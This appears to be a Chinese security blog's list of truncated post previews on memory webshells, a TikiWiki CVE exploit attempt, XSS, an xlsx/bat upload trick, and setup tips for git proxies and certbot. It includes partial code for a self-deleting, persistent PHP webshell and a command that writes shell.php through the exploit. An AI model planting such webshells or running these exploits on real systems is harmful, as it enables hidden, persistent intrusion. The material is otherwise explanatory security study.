内存马是什么简单说就是没有文件落地的webshell。 常规的java webshell都是上传一个jsp文件,访问这个jsp文件的路径执行命令。但是这样做查文件很容易查出来,文件一删webshell就没了。 内存马是在内存里的,可以访问到但找不到对应路径的文件,后缀也不一定是jsp。更隐蔽,更难排查。 Filter型内存马内存马有很多种实现方式,filter型内存马是通过filter实现的内存马。 filter是在请求被servlet处理之前执行的一段程序,可以对请求进行拦截、修改。通常用来实现一些业务逻辑之外的功能,比如日志记录、全站加密、权限校验等。 通过修改存储filter的变量,把w
CVE-2020-15906 vulhub/tikiwiki/CVE-2020-15906/README.zh-cn.md at master · vulhub/vulhub · GitHub 比赛遇见个tikiwiki,byd执行不了几条命令就崩,写马还写不进去,各种转义转着转着就崩了,比如这个python poc.py 127.0.0.1:8080 / 'echo "\<?php${IFS}?\>">shell.php',这里空格会截断,转义就崩,用IFS也崩。比赛的时候没给我
今天遇见一个破站,又是关键词过滤又是html解析器过滤的,完了前端还写的稀烂,输个引号就闭合,输个尖括号后半段html属性都当文本渲染了。怎么看怎么像有xss。 其中有个接口传了个Id,返回了一个html页面。后来一看是打开的新的iframe。这个接口的Id直接拼接到Easy UI的DataGrid组件里的参数里去了。类似下面这种 123456789<table class="easyui-datagrid" style="width:400px;height:250px" data-options="url:'http://x
github国内连不上,git clone用不了,以前都是直接下载zip,但这样更新不好更新。 1git config --global https.proxy socks5://127.0.0.1:7890 socks5也可以换成http,具体情况看端口开的是什么代理 https.proxy是对所有https协议的链接使用代理,http.proxy是对http协议的链接使用代理,但github一般都是https 查看代理:git config --global --get https.proxy 取消代理:git config --global --unset https.proxy
当自己的网站需要https的时候,就要申请证书。很多地方都可以申请免费证书,Let’s Encrypt就是其中之一。 用certbot自动申请,安装certbot 123apt-get updateapt-get install certbotapt-get install python-certbot-nginx 如果已经在**/etc/nginx/**里配置好了http站点,直接执行: 1certbot --nginx -d <example.com> <example.com>替换为实际的域名 等一会儿显示Successfully
老爹还有一件事:高贵的马儿驱除体内一切外力,不论怎么删除它都会死而复生 不死马是什么一个经典的不死马是这样的: 123456789101112<?php ignore_user_abort(true);# 忽略用户连接,连接断了也不停止执行 set_time_limit(0);# 脚本最大执行时间(秒),默认是30秒,设为0永不超时 unlink(__FILE__);# 删除此文件,可选,不写会留下这个文件容易被查到 $file = 'test.php'; $code = '<?php if(md5($_GET["
博客之前一直用的随机图api,虽然省心,但是加载慢,而且加载的角色都不认识。发现绳网情报站有绝区零所有角色的影画,所以写个爬虫全都抓下来当封面用。中间遇到好多新技巧,记录一下。 分析来源https://baike.mihoyo.com/zzz/wiki/ 先分析页面,打开影画页面,复制影画展示3的图片url,发现是这样的: 1https://act-upload.mihoyo.com/nap-obc-indep/2024/11/06/76099754/93171af7d069601a30c8129ebbfaff34_7755247229681328322.png?x-oss-process=i
情人节.2025-02-14.log 20:00 《我绝对不会碰你》20:15 《你好香啊》20:30 《我可以亲你一下吗》20:35 《好像有点热是不是》20:40 《要不你把衣服脱了吧》20:50 《你身体好软》20:55 《可以抱着你吗》21:00 《你太迷人了》21:15 《什么?你也做web?》21:20 《啊?你今天还没刷?》21:23 《来,我来陪做》21:25 《什么?你不知道SSTI?》21:30 《没事,我帮你看看你的基本功》21:50 《没事的宝宝,你还不熟悉jinja2》22:00 《宝宝,我教你用Fenjing》23:10 《Fenjing都用不明白吗?》23:40
今天遇见一个存xlsx文件的站,上传的时候只校验后缀,提交到文件列表里的xlsx文件会被解析,解析成功才能从其他接口用id的形式访问,解析失败则不能访问。 添加到文件列表里的时候,没有对文件名进行校验,可以修改为任意后缀。 众所周知Windows下能执行代码的最宽松的文件格式就是bat了,所以尝试在xlsx文件能被正常解析的情况下插入bat格式的命令。 直接在文件头里插入不行,解析会出错。大部分情况下wps能正常打开,但是上传后解析失败。 直接在文件末尾插入也不行,因为bat执行遇到\x00字节的时候会停止 所以要用注释把xlsx文件中的\x00注释掉 bat里注释有很多种(虽然很多都不是标准
简介跨站脚本攻击(Cross-site Scripting),本质是html注入导致的js代码执行。 由于CSS这个缩写被Cascading Style Sheets(层叠样式表)占用了,所以Cross-site Scripting(跨站脚本攻击)被缩写为XSS。 xss一般的利用方法就是导入其他站点的脚本来执行,所以叫跨站脚本攻击。但是由于直接执行js语句也可以达到相同效果,所以测试时只要可以执行js代码就算作漏洞。 漏洞分类反射型反射型xss的特点是payload经过服务器,但不经过数据库,即时触发。服务器直接将接收的payload拼接在html中返回导致html注入触发xss。 举一个简